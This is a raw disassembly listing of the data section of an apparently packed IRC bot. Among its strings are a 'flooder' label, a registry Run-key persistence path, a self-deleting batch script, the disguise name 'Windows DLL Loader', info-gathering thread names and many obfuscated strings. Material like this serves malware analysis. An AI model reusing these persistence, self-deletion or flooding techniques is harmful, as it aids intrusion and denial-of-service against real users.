dword_418A5C dd 313A3Ah ; DATA XREF: sub_40435B+42�o
dword_418A60 dd 7525h ; DATA XREF: sub_4055E5+458�o
; sub_4055E5+69E�o ...
dword_418A64 dd 252E7525h, 75252E75h, 3A75252Eh, 7525h ; DATA XREF: sub_4055E5+31E�o
; sub_4055E5+40B�o ...
aU_U_U_UU db '%u.%u.%u.%u:%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+2A3�o
; sub_4055E5+3AF�o ...
align 4
aU db '%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+229�o
; sub_4055E5+351�o ...
align 10h
aLgFlooder db 'LG flooder',0 ; DATA XREF: sub_405E45+109�o
align 4
aGetmoduleinfor db 'GetModuleInformation',0 ; DATA XREF: sub_405FA3+5E�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_405FA3+4B�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_405FA3+38�o
align 10h
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_405FA3:loc_405FC8�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_405FA3+F�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_406041+136�o
; UPX1:0041BBD0�o ...
align 4
dword_418B04 dd 2343003h, 3693425h, 25202E02h, 20583830h, 58383025h
; DATA XREF: sub_40637C+FE�o
dd 732520h
dword_418B1C dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 320676Eh
; DATA XREF: sub_40637C+51�o
dd 25023430h, 2032569h, 6F727020h, 73736563h, 3A7365h
dword_418B44 dd 7473694Ch, 6F727020h, 73736563h, 7365h ; DATA XREF: sub_4064BF+31�o
dword_418B54 dd 58323025h, 0 ; DATA XREF: sub_406722+266�o
; sub_4147E5+11�o ...
dword_418B5C dd 58383025h, 0 ; DATA XREF: sub_406722+201�o
; sub_40A9CF+1C12�o
dword_418B64 dd 7325h ; DATA XREF: sub_406722+1E3�o
; sub_406722+296�o ...
aHkus db 'HKUS',0 ; DATA XREF: sub_406722+8D�o
align 10h
aHklm db 'HKLM',0 ; DATA XREF: sub_406722+6B�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_406722+49�o
align 10h
aHkcr db 'HKCR',0 ; DATA XREF: sub_406722+27�o
align 4
off_418B88 dd offset dword_418DD0 ; DATA XREF: sub_406E8E+4B�r
; sub_406E8E+8D�r ...
off_418B8C dd offset dword_418DA8 ; DATA XREF: sub_406E8E+106�r
; sub_406E8E+12A�r ...
dd offset dword_418D98
dd offset dword_418DA8
dd offset dword_418D88
dd offset dword_418D64
dd offset dword_418D54
dd offset dword_418D34
dd offset dword_418D20
dd offset dword_418D34
dd offset dword_418D0C
dd offset dword_418CF4
dd offset dword_418CE4
dd offset dword_418CD0
dd offset dword_418CBC
dd offset loc_418C9C
dd offset aKZdzvlUU ; "Š²¶‡¤§¢«ì“Γ"
dd offset aKZdJssgEudaFts ; "ª²¶‡¤±¦è‘ƒÔ¥î¤Ã”☘¸"
dd offset dword_418C5C
dd offset aKZdJssgEudaFts ; "ª²¶‡¤±¦è‘ƒÔ¥î¤Ã”☘¸"
dd offset dword_418C4C
dd offset aIdbLsRLtuiGiXu ; "¸²©„¡·µ¼«™ØÖ۶Ë➉¼±£©»Öå“塀Ŝ"
dd offset byte_418C10
dd offset dword_418BF0
align 10h
dword_418BF0 dd 9ABAABB4h, 0AEBBA7A7h, 98FFD6B6h, 0C89BB2E3h, 0ADF9B69Ch
; DATA XREF: UPX1:00418BE4�o
dd 0A7B8A4B0h, 0C493B0h, 0
byte_418C10 db 90h ; DATA XREF: UPX1:00418BE0�o
db 0A7h, 0A1h, 98h
dd 0ADA6BBA4h, 93CE93ECh, 2 dup(0)
aIdbLsRLtuiGiXu db '¸²©„¡·µ¼«™ØÖ۶Ë➉¼±£©»Öå“塀Ŝ',0 ; DATA XREF: UPX1:00418BDC�o
align 4
dd 0
dword_418C4C dd 9BBEAE98h, 0ADACB1E6h, 2 dup(0) ; DATA XREF: UPX1:00418BD8�o
dword_418C5C dd 87B6B28Ah, 0E6A2A781h, 0D38EA7h, 0 ; DATA XREF: UPX1:00418BD0�o
aKZdJssgEudaFts db 'ª²¶‡¤±¦è‘ƒÔ¥î¤Ã”☘¸',0 ; DATA XREF: UPX1:00418BCC�o
; UPX1:00418BD4�o
align 8
aKZdzvlUU db 'Š²¶‡¤§¢«ì“Γ',0 ; DATA XREF: UPX1:00418BC8�o
align 4
dd 0
; ---------------------------------------------------------------------------
loc_418C9C: ; DATA XREF: UPX1:00418BC4�o
scasb
stosd
mov bh, 8Ch
cmpsd
mov ds:938CE8A7h, eax
retn 0F881h
; ---------------------------------------------------------------------------
db 0A5h, 82h, 86h
dd 8DABABBFh, 0A4B8B5BFh, 2 dup(0)
dword_418CBC dd 8DABAB9Fh, 0A4B8B5BFh, 93CE93ECh, 2 dup(0) ; DATA XREF: UPX1:00418BC0�o
dword_418CD0 dd 89B7ABAEh, 89F4A4A5h, 82D893A5h, 2 dup(0) ; DATA XREF: UPX1:00418BBC�o
dword_418CE4 dd 89B7AB8Eh, 0ADFAA4A5h, 93BAh, 0 ; DATA XREF: UPX1:00418BB8�o
dword_418CF4 dd 8CB7ABAEh, 0E8A7A3A7h, 9AC68E87h, 0D48CA5F8h, 2 dup(0)
; DATA XREF: UPX1:00418BB4�o
dword_418D0C dd 84A9BA9Ch, 0BAB1A6A7h, 93CE93ECh, 2 dup(0) ; DATA XREF: UPX1:00418BB0�o
dword_418D20 dd 0A1B7AB8Eh, 0A6BBB3A7h, 93CE93ECh, 2 dup(0) ; DATA XREF: UPX1:00418BA8�o
dword_418D34 dd 8CB7ABAEh, 0E8A7A3A7h, 99D1998Eh, 0D6A8F7F9h, 8BB0AE89h
; DATA XREF: UPX1:00418BA4�o
; UPX1:00418BAC�o
dd 0A7BDA0A9h, 0ACh, 0
dword_418D54 dd 87BEAD95h, 0B0B1FAA6h, 0A7h, 0 ; DATA XREF: UPX1:00418BA0�o
dword_418D64 dd 8DB0AEBAh, 9BF4A0A6h, 93C084A7h, 0D3BBF7E5h, 85B0B697h
; DATA XREF: UPX1:00418B9C�o
dd 0BA84F4ADh, 85D395ADh, 0E4h, 0
dword_418D88 dd 9BABB19Ah, 0ADACB1E6h, 2 dup(0) ; DATA XREF: UPX1:00418B98�o
dword_418D98 dd 9BB8B1B0h, 0B0B1FABBh, 0A7h, 0 ; DATA XREF: UPX1:00418B90�o
dword_418DA8 dd 89BAADB5h, 0AD87F4A4h, 9FC483A1h, 0E7C9AEE3h, 87B1B68Ch
; DATA XREF: UPX1:off_418B8C�o
; UPX1:00418B94�o
dd 0B1A0BDBAh, 84D3A5E2h, 0C38ABEE1h, 2 dup(0)
dword_418DD0 dd 89AAB195h, 0B0B1FABBh, 0A7h, 0 ; DATA XREF: UPX1:off_418B88�o
dword_418DE0 dd 293Ah ; DATA XREF: sub_406A23+9C�o
dword_418DE4 dd 5Ch ; DATA XREF: sub_406A23+1B�o
; sub_406AE7+1B�o ...
dword_418DE8 dd 7078655Ch, 65726F6Ch, 78652E72h, 65h ; DATA XREF: sub_406B81+1B�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_406C51+1C�o
align 4
a@echoOffDelete db '@echo off',0Dh,0Ah ; DATA XREF: sub_406D90+A8�o
db ':deleteagain',0Dh,0Ah
db 'del /A:H /F %s',0Dh,0Ah
db 'del /F %s',0Dh,0Ah
db 'if exist %s goto deleteagain',0Dh,0Ah
db 'del %s',0Dh,0Ah,0
align 4
a_bat db '.bat',0 ; DATA XREF: sub_406D90+39�o
align 4
aWindowsDllLoad db 'Windows DLL Loader',0 ; DATA XREF: sub_406E8E+20D�o
; sub_407148+19D�o
align 10h
aQuitSUninstall db 'QUIT :%s uninstalled.',0 ; DATA XREF: sub_407148+177�o
; sub_407148+1C9�o
align 4
dword_418EB8 dd 6E6E6F43h, 69746365h, 66206E6Fh, 206D6F72h, 2343003h
; DATA XREF: sub_40732D+115�o
dd 2037325h, 206F7420h, 6B636F73h, 34300373h, 3752502h
dd 65732002h, 72657672h, 7325h
dword_418EEC dd 6A657220h, 65746365h, 64h ; DATA XREF: sub_40732D:loc_407423�o
dword_418EF8 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_40764D+6A�o
dd 736B636Fh, 72657320h, 20726576h, 70206E6Fh, 2074726Fh
dd 2343003h, 2037325h, 0
dword_418F2C dd 6B636F53h, 65732073h, 72657672h, 206E6F20h, 74726F70h
; DATA XREF: sub_4077DD+9C�o
dd 34300320h, 3732502h, 2
dword_418F4C dd 20h ; DATA XREF: sub_407928+4C�o
; sub_407928+96�o ...
dword_418F50 dd 30h ; DATA XREF: sub_407E0C+CB�o
; sub_40CA29+13D�o ...
dword_418F54 dd 252E7325h, 73252E73h, 73252Eh ; DATA XREF: sub_407F3D+118�o
; sub_40806A+BD�o
dword_418F60 dd 0C6B7B194h, 0B9BBABh, 0 ; DATA XREF: sub_408887+6�o
dword_418F6C dd 0C6AEB58Eh, 0BAA6B1BCh, 99D5D8A3h, 0D48BF9FAh, 2 dup(0)
; DATA XREF: sub_408887+14�o
dword_418F84 dd 0C6B7B194h, 0B1ACh, 0 ; DATA XREF: sub_408887+22�o
dword_418F90 dd 85ACA39Dh, 0BCB1BAE6h, 2 dup(0) ; DATA XREF: sub_408887+30�o
dword_418FA0 dd 8FB6AD9Eh, 0A9FAB1A4h, 0A7h, 0 ; DATA XREF: sub_408887+3E�o
dword_418FB0 dd 8DB7AB97h, 0E6BAA7A5h, 0D8DB99A1h, 0A2F6h, 0 ; DATA XREF: sub_408887+4C�o
off_418FC4 dd offset dword_4190E8 ; DATA XREF: sub_4088FC+19�r
; sub_4088FC+60�r
off_418FC8 dd offset dword_4190B4 ; DATA XREF: sub_4088FC+8A�r
dd offset dword_419098
dd offset dword_419054
dd offset dword_41903C
dd offset dword_418FE4
dd 2 dup(0)
dword_418FE4 dd 86AEAD9Dh, 0ACB5BBA4h, 9BD791ECh, 0DFC7A4F2h, 87B6AA98h
; DATA XREF: UPX1:00418FD8�o
dd 0A5BBB7E6h, 9BD791EDh, 0C2C6A4F2h, 84B7B596h, 0E7B0B5A7h
dd 98D19FB1h, 0D6C6B3F2h, 89BAB296h, 0A9ADFBB8h, 0A9D999AAh
dd 0C383B2F5h, 8DB5A78Eh, 0BC8BE6ACh, 0C79BC7AFh, 0C391B2B9h
dd 2 dup(0)
dword_41903C dd 8FF7B18Ch, 0BBB1B9A9h, 9FCFD8F3h, 0C5C7B0FAh, 0AF96h
; DATA XREF: UPX1:00418FD4�o
dd 0
dword_419054 dd 86AEAD9Dh, 0ACB5BBA4h, 0C799C5EDh, 95C6B1B8h, 0D9EDA4C8h
; DATA XREF: UPX1:00418FD0�o
dd 0E5E3E6FCh, 9382C6FAh, 0C0D1E3BAh, 8BE1EFC0h, 0FDF9ECF9h
dd 0CFD2C7A3h, 9EDCB5A4h, 0C7BCF1CCh, 0BBB5A7A5h, 0D8D598BBh
dd 8CAFF2h, 0
dword_419098 dd 86AEAD9Dh, 0ACB5BBA4h, 95DF9BECh, 0C99AB8E5h, 8BF7B69Fh
; DATA XREF: UPX1:00418FCC�o
dd 0B9A7h, 0
dword_4190B4 dd 89ADA39Dh, 0E7BAB1E7h, 0D9D19FA0h, 0D49BA2F4h, 0C7ADAC9Ch
; DATA XREF: UPX1:off_418FC8�o
dd 0AFBBBB8Fh, 99E293AEh, 0C78BBBF8h, 9BB78B8Bh, 0A4B8B5BCh
dd 939884A7h, 0B2EFh, 0
dword_4190E8 dd 84B6AD8Dh, 0E6A6B5AAh, 91D999A5h, 0C5C7B2FBh, 0AF96h
; DATA XREF: UPX1:off_418FC4�o
dd 0
off_419100 dd offset loc_415353+2 ; DATA XREF: sub_408342+2C�o
dword_419104 dd 74737953h, 69206D65h, 726F666Eh, 6974616Dh, 2D206E6Fh
; DATA XREF: sub_4083AD+3CE�o
dd 3A534F20h, 6E695720h, 73776F64h, 34300320h, 3732502h
dd 25282002h, 76202C73h, 2343003h, 252E6425h, 2C020364h
dd 30036220h, 64250234h, 2E290203h, 55504320h, 7325203Ah
dd 34300320h, 3642502h, 7A484D02h, 6152202Eh, 3203A6Dh
dd 25023430h, 4D020364h, 30032F42h, 64250234h, 424D0203h
dd 65726620h, 49202E65h, 3A367650h, 34300320h, 3732502h
dd 55202E02h, 6D697470h, 3203A65h, 25023430h, 64020364h
dd 73257961h, 34300320h, 3642502h, 756F6802h, 20732572h
dd 2343003h, 2036425h, 756E696Dh, 73256574h, 6F43202Eh
dd 7475706Dh, 616E7265h, 203A656Dh, 2343003h, 2037325h
dd 7355202Eh, 203A7265h, 2343003h, 2037325h, 0A0D2Eh
dword_4191F4 dd 73h ; DATA XREF: sub_4083AD:loc_4086C8�o
; sub_4083AD:loc_4086E7�o ...
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_4083AD+2D2�o
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_4083AD+296�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4083AD:loc_4085EB�o
; sub_408B30:loc_408CB4�o ...
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_4083AD+232�o
; sub_408B30+178�o ...
a2003 db '2003',0 ; DATA XREF: sub_4083AD+1FF�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_4083AD+1E1�o
align 10h
a2000 db '2000',0 ; DATA XREF: sub_4083AD+1C3�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_4083AD+1A5�o
align 4
a98 db '98',0 ; DATA XREF: sub_4083AD+187�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_4083AD+166�o
align 4
a95 db '95',0 ; DATA XREF: sub_4083AD+153�o
align 4
aNoSp db 'no SP',0 ; DATA XREF: sub_4083AD+12E�o
align 10h
a?: ; DATA XREF: sub_4083AD+124�o
unicode 0, <?>,0
aSysinfoThread db 'Sysinfo thread',0 ; DATA XREF: sub_4087C4+2B�o
align 4
dword_419284 dd 7774654Eh, 206B726Fh, 6F666E69h, 74616D72h, 206E6F69h
; DATA XREF: sub_408B30+2D4�o
dd 6F48202Dh, 203A7473h, 2343003h, 2037325h, 614E202Eh
dd 203A656Dh, 2343003h, 2037325h, 7954202Eh, 203A6570h
dd 2343003h, 2037325h, 5049202Eh, 203A3676h, 2343003h
dd 2037325h, 6946202Eh, 61776572h, 64656C6Ch, 3003203Ah
dd 73250234h, 202E0203h, 6574614Ch, 3A79636Eh, 34300320h
dd 3732502h, 25202C02h, 53202E75h, 64656570h, 3003203Ah
dd 30250234h, 366322Eh, 424B2B02h, 6365732Fh, 5249202Eh
dd 70552043h, 656D6974h, 3003203Ah, 64250234h, 61640203h
dd 20732579h, 2343003h, 2036425h, 72756F68h, 3207325h
dd 25023430h, 6D020364h, 74756E69h, 2E732565h, 0
aGood db 'Good',0 ; DATA XREF: sub_408B30+1F9�o
align 4
aAvarage db 'Avarage',0 ; DATA XREF: sub_408B30+1E3�o
aBad db 'Bad',0 ; DATA XREF: sub_408B30+1CD�o
aLan db 'LAN',0 ; DATA XREF: sub_408B30:loc_408C8F�o
aModem db 'Modem',0 ; DATA XREF: sub_408B30+14D�o
align 10h
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_408B30+F5�o
; sub_408B30+108�o
aNetinfoThread db 'Netinfo thread',0 ; DATA XREF: sub_408E4A+2B�o
align 4
dword_419398 dd 5C3A41h ; DATA XREF: sub_408E8E+6�r
; sub_408F2E+4E�r ...
dword_41939C dd 6F547325h, 206C6174h, 76697264h, 203A7365h, 2343003h
; DATA XREF: sub_408F2E+270�o
dd 2037525h, 6F54202Ch, 206C6174h, 63617073h, 3203A65h
dd 25023430h, 4D020375h, 72662042h, 2E6565h
dword_4193D4 dd 30037325h, 73250234h, 73250203h, 0 ; DATA XREF: sub_408F2E+1ED�o
dword_4193E4 dd 30037325h, 73250234h, 73250203h, 34300320h, 3752502h
; DATA XREF: sub_408F2E+1C5�o
dd 20424D02h, 65657266h, 0
dword_419404 dd 202Eh ; DATA XREF: sub_408F2E+17C�o
; sub_408F2E+24A�o
aUnknown db 'unknown',0 ; DATA XREF: sub_408F2E:loc_40902D�o
; sub_4129CA+34�o
aRamdisk db 'ramdisk',0 ; DATA XREF: sub_408F2E+F6�o
aCdRom db 'cd-rom',0 ; DATA XREF: sub_408F2E+E4�o
align 10h
aRemote db 'remote',0 ; DATA XREF: sub_408F2E+D2�o
align 4
aFixed db 'fixed',0 ; DATA XREF: sub_408F2E+C0�o
align 10h
aRemovable db 'removable',0 ; DATA XREF: sub_408F2E+AE�o
align 4
aDriveInformati db 'Drive information - ',0 ; DATA XREF: sub_408F2E+2E�o
align 4
aDriveinfoThrea db 'Driveinfo thread',0 ; DATA XREF: sub_4091E2+2B�o
align 4
aThread db 'thread',0 ; DATA XREF: sub_4093B6+98�o
; sub_4094E6+93�o
align 10h
aBtg db 'btg',0 ; DATA XREF: sub_4093B6+93�o
dword_419474 dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: sub_4093B6+67�o
aBtgTriedExecut db '- btg tried executing an unreadable address. (%08X)',0
aS db '*%s*',0 ; DATA XREF: sub_4097A7+81�o
; sub_4098F3+C4�o
align 4
dword_4194BC dd 2343003h, 2036925h, 7325202Eh, 0 ; DATA XREF: sub_409AD5+DA�o
dword_4194CC dd 3430032Dh, 2037802h ; DATA XREF: sub_409AD5:loc_409B25�o
aNoThreadsRunni db '- No threads running.',0
align 4
dword_4194EC dd 3430032Dh, 2037802h, 694C202Dh, 6E697473h, 30032067h
; DATA XREF: sub_409AD5+3A�o
dd 69250234h, 32F0203h, 25023430h, 20020369h, 65726874h
dd 3A736461h, 0
aCouldNotGetAVa db 'Could not get a valid ICMP handle',0Ah,0 ; DATA XREF: sub_409CB1+15�o
align 10h
dword_419540 dd 2343003h, 2036425h, 2020202Eh, 3 dup(2020202Ah), 6F727245h
; DATA XREF: sub_409DD0+3A3�o
dd 30033A72h, 64250234h, 203h
dword_419568 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+37F�o
dd 736D6425h, 34300320h, 2E642502h, 252E6425h, 64252E64h
dd 203h
dword_419594 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+32F�o
dd 736D6425h, 34300320h, 3732502h, 25282002h, 64252E64h
dd 2E64252Eh, 296425h
aCouldNotResolv db 'Could not resolve name',0 ; DATA XREF: sub_409DD0:loc_409F06�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409DD0+80�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409DD0+6A�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409DD0:loc_409E24�o
align 4
aIcmp_dll db 'ICMP.DLL',0 ; DATA XREF: sub_409DD0+34�o
align 4
unk_419618 db 55h ; U ; DATA XREF: sub_40A1A7+C�o
db 73h, 61h, 67h
db 65h ; e
db 3Ah, 20h, 3
db 30h ; 0
db 34h, 2, 74h
db 72h ; r
db 61h, 63h, 65h
db 3
db 2, 20h, 3Ch
db 3
db 30h, 34h, 2
db 68h ; h
db 6Fh, 73h, 74h
db 3
db 2, 3Eh, 20h
aHopcountTimeou db '[<hopcount> <timeout> <pingcount>]',0
align 4
dword_41965C dd 202h ; DATA XREF: sub_40A2D2+159�o
dword_419660 dd 0A0D7325h, 0 ; DATA XREF: sub_40A2D2+6E�o
dword_419668 dd 3334h ; DATA XREF: sub_40A2D2+41�o
dword_41966C dd 3430032Dh, 3752502h, 51202D02h, 79726575h, 20676E69h
; DATA XREF: sub_40A2D2+24�o
dd 2343003h, 2037325h, 726F6620h, 34300320h, 3732502h
dd 3A02h
dword_419698 dd 6F727245h, 75712072h, 69797265h, 320676Eh, 25023430h
; DATA XREF: sub_40A4A4+44�o
dd 2E020373h, 0
dword_4196B4 dd 72657551h, 676E6979h, 34300320h, 3732502h, 6F662002h
; DATA XREF: sub_40A50E+97�o
dd 30032072h, 73250234h, 203h
dword_4196D4 dd 81B6AA8Eh, 0BAB5FABBh, 989898ABh, 0A3F2h, 0
; DATA XREF: sub_40A50E:loc_40A562�o
aAbcdef db 'abcdef',0 ; DATA XREF: sub_40A8AD+1B�o
align 10h
aUsername db 'username',0 ; DATA XREF: sub_40A9CF:loc_40C8EA�o
align 4
aId db 'id',0 ; DATA XREF: sub_40A9CF+1EF2�o
align 10h
dword_419700 dd 29F60h ; DATA XREF: sub_40A9CF+1ECD�r
align 8
dword_419708 dd 69747055h, 2D20656Dh, 73795320h, 3A6D6574h, 34300320h
; DATA XREF: sub_40A9CF+1EB1�o
dd 3642502h, 79616402h, 3207325h, 25023430h, 68020364h
dd 2572756Fh, 30032073h, 64250234h, 696D0203h, 6574756Eh
dd 202E7325h, 3A435249h, 34300320h, 3642502h, 79616402h
dd 3207325h, 25023430h, 68020364h, 2572756Fh, 30032073h
dd 64250234h, 696D0203h, 6574756Eh, 7325h
dword_41977C dd 3351E90h ; DATA XREF: sub_40A9CF+1C87�r
dd 2 dup(0)
dword_419788 dd 3290h ; DATA XREF: sub_40A9CF+1C72�r
align 10h
dword_419790 dd 2C45458h ; DATA XREF: sub_40A9CF+1C4B�r
dd 2 dup(0)
a9252 db '9252',0 ; DATA XREF: sub_40A9CF+1BFA�o
align 4
dword_4197A4 dd 51F0B7A1h ; DATA XREF: sub_40A9CF+1BE9�r
dd 3 dup(0)
dword_4197B4 dd 26C8CE80h ; DATA XREF: sub_40A9CF+1BC2�r
align 10h
dword_4197C0 dd 26B60h ; DATA XREF: sub_40A9CF+1BAD�r
align 8
dword_4197C8 dd 2C684E80h ; DATA XREF: sub_40A9CF+1B86�r
dd 2 dup(0)
dword_4197D4 dd 2C558h ; DATA XREF: sub_40A9CF+1B71�r
dd 0
dword_4197DC dd 29E403A0h ; DATA XREF: sub_40A9CF+1B36�r
dd 2 dup(0)
dword_4197E8 dd 6B6E696Ch, 30037620h, 64250234h, 32E0203h, 25023430h
; DATA XREF: sub_40A9CF+1B17�o
dd 3643330h, 20732502h, 6E69575Bh, 5D3233h
dword_41980C dd 17408308h ; DATA XREF: sub_40A9CF+1AFC�r
dd 2 dup(0)
dword_419818 dd 172A8h ; DATA XREF: sub_40A9CF+1AE7�r
align 10h
dword_419820 dd 65657053h, 3203A64h, 25023430h, 4B020375h, 65732F42h
; DATA XREF: sub_40A9CF+1AC8�o
dd 63h
dword_419838 dd 0B2ECE0h ; DATA XREF: sub_40A9CF+19B1�r
dd 2 dup(0)
dword_419844 dd 2343003h, 2037325h ; DATA XREF: sub_40A9CF+1992�o
aHasNoIpv4End_ db ' has no ipv4 end.',0
align 10h
dword_419860 dd 20656854h, 34767069h, 646E6520h, 20666F20h, 2343003h
; DATA XREF: sub_40A9CF+1976�o
dd 2037325h, 20736920h, 2343003h, 252E6925h, 69252E69h
dd 369252Eh, 2
a2002 db '2002',0 ; DATA XREF: sub_40A9CF+1851�o
align 4
dword_419898 dd 465F10ECh ; DATA XREF: sub_40A9CF+180B�r
dd 3 dup(0)
dword_4198A8 dd 2343003h, 2037325h, 44202D20h, 203A534Eh, 2343003h
; DATA XREF: sub_40A9CF+17C1�o
dd 2037325h, 0
dword_4198C4 dd 11BA18h ; DATA XREF: sub_40A9CF+1710�r
align 10h
dword_4198D0 dd 6F727245h, 65722072h, 766C6F73h, 20676E69h, 2343003h
; DATA XREF: sub_40A9CF+16F1�o
; sub_40A9CF+17EC�o
dd 2037325h, 2Eh
dword_4198EC dd 2343003h, 2037325h, 55202D20h, 6F6E6B6Eh, 74206E77h
; DATA XREF: sub_40A9CF+16AA�o
dd 20657079h, 2343003h, 2036425h, 64646120h, 73736572h
dd 3003203Ah, 73250234h, 203h
dword_419920 dd 2343003h, 2037325h, 49202D20h, 20367650h, 72646461h
; DATA XREF: sub_40A9CF+1659�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419944 dd 2343003h, 2037325h, 49202D20h, 20347650h, 72646461h
; DATA XREF: sub_40A9CF+1602�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419968 dd 3Ch ; DATA XREF: sub_40A9CF:loc_40BFBA�o
; sub_40A9CF:loc_40C011�o ...
dword_41996C dd 16A18h ; DATA XREF: sub_40A9CF+1534�r
dd 0
aQuitChangingSe db 'QUIT :changing server',0 ; DATA XREF: sub_40A9CF:loc_40BED3�o
align 4
dword_41998C dd 0E3E403A8h ; DATA XREF: sub_40A9CF+14F5�r
dd 3 dup(0)
dword_41999C dd 546C2A8h ; DATA XREF: sub_40A9CF+14E0�r
dd 2 dup(0)
dword_4199A8 dd 4618h ; DATA XREF: sub_40A9CF+14B2�r
align 10h
dword_4199B0 dd 0A42278h ; DATA XREF: sub_40A9CF+1484�r
dd 2 dup(0)
dword_4199BC dd 2A860h ; DATA XREF: sub_40A9CF+146F�r
dd 0
dword_4199C4 dd 56EC267Eh ; DATA XREF: sub_40A9CF+1450�r
dd 3 dup(0)
dword_4199D4 dd 72616843h, 65746361h, 6E692072h, 68202D20h, 203A7865h
; DATA XREF: sub_40A9CF+1431�o
dd 2343003h, 30257830h, 2035832h, 63656420h, 3003203Ah
dd 75250234h, 2E0203h
dword_419A04 dd 137128h ; DATA XREF: sub_40A9CF+1400�r
align 10h
dword_419A10 dd 23901E20h ; DATA XREF: sub_40A9CF+1399�r
dd 2 dup(0)
dword_419A1C dd 15E10h ; DATA XREF: sub_40A9CF+1374�r
dd 0
dword_419A24 dd 0A2C60h ; DATA XREF: sub_40A9CF+135F�r
align 10h
dword_419A30 dd 74A60h ; DATA XREF: sub_40A9CF+134A�r
dd 2 dup(0)
dword_419A3C dd 45444F4Dh, 732520h ; DATA XREF: sub_40A9CF+1333�o
dword_419A44 dd 159790h ; DATA XREF: sub_40A9CF+1310�r
align 10h
dword_419A50 dd 0D5919B11h ; DATA XREF: sub_40A9CF+12E9�r
align 10h
aDebugModeIsS_ db 'Debug mode is %s.',0 ; DATA XREF: sub_40A9CF+129C�o
align 4
aOff db 'off',0 ; DATA XREF: sub_40A9CF:loc_40BC5B�o
aOn db 'on',0 ; DATA XREF: sub_40A9CF+1280�o
; sub_40A9CF:loc_40BC84�o
align 4
dword_419A7C dd 5136F8h ; DATA XREF: sub_40A9CF+125F�r
dd 2 dup(0)
dword_419A88 dd 221F8h ; DATA XREF: sub_40A9CF+122B�r
align 10h
dword_419A90 dd 50C1B50h ; DATA XREF: sub_40A9CF+11E7�r
dd 2 dup(0)
dword_419A9C dd 2C338h ; DATA XREF: sub_40A9CF+11A3�r
dd 0
dword_419AA4 dd 0B04290h ; DATA XREF: sub_40A9CF+114C�r
align 10h
dword_419AB0 dd 54524150h, 732520h ; DATA XREF: sub_40A9CF+1135�o
dword_419AB8 dd 14FE20h ; DATA XREF: sub_40A9CF+1112�r
dd 2 dup(0)
dword_419AC4 dd 11AA88h ; DATA XREF: sub_40A9CF+10B0�r
align 10h
dword_419AD0 dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_40A9CF+1098�o
; sub_40A9CF+10FA�o ...
dword_419ADC dd 146288h ; DATA XREF: sub_40A9CF+102C�r
dd 2 dup(0)
aQuitSRemoved_ db 'QUIT :%s removed.',0 ; DATA XREF: sub_40A9CF+100A�o
align 4
dword_419AFC dd 4729D50h ; DATA XREF: sub_40A9CF+FF6�r
dd 2 dup(0)
dword_419B08 dd 56EB58h ; DATA XREF: sub_40A9CF+FC1�r
dd 2 dup(0)
dword_419B14 dd 5F3750h ; DATA XREF: sub_40A9CF+F80�r
align 10h
dword_419B20 dd 423C479Ah ; DATA XREF: sub_40A9CF+F52�r
align 10h
dword_419B30 dd 23410B60h ; DATA XREF: sub_40A9CF+F24�r
dd 2 dup(0)
dword_419B3C dd 9815D395h ; DATA XREF: sub_40A9CF+EFE�r
dd 3 dup(0)
dword_419B4C dd 4698D60h ; DATA XREF: sub_40A9CF+ED0�r
dd 2 dup(0)
dword_419B58 dd 10DA78h ; DATA XREF: sub_40A9CF+EAA�r
dd 2 dup(0)
dword_419B64 dd 74736F48h, 72646441h, 3003203Ah, 73250234h, 203h
; DATA XREF: sub_40A9CF+E77�o
dword_419B78 dd 77400328h ; DATA XREF: sub_40A9CF+E5A�r
dd 3 dup(0)
dword_419B88 dd 65736162h, 64203436h, 646F6365h, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+E2F�o
dd 2037325h, 0
dword_419BA4 dd 512EA0h ; DATA XREF: sub_40A9CF+DC8�r
align 10h
aItTookMeUms_ db 'It took me %ums.',0 ; DATA XREF: sub_40A9CF+DA9�o
align 4
dword_419BC4 dd 65736162h, 65203436h, 646F636Eh, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+D20�o
dd 2037325h, 0
dword_419BE0 dd 20EA0h ; DATA XREF: sub_40A9CF+CAF�r
align 8
dword_419BE8 dd 65782209h ; DATA XREF: sub_40A9CF+C68�r
dd 3 dup(0)
dword_419BF8 dd 109E96E7h ; DATA XREF: sub_40A9CF+C05�r
dd 4 dup(0)
dword_419C0C dd 0A4053CD8h ; DATA XREF: sub_40A9CF+BDE�r
dd 3 dup(0)
dword_419C1C dd 162208h ; DATA XREF: sub_40A9CF+B97�r
dd 2 dup(0)
dword_419C28 dd 0C17A208h ; DATA XREF: sub_40A9CF+B82�r
dd 2 dup(0)
dword_419C34 dd 4CF2208h ; DATA XREF: sub_40A9CF+B6D�r
align 10h
dword_419C40 dd 1480A660h ; DATA XREF: sub_40A9CF+B3F�r
dd 2 dup(0)
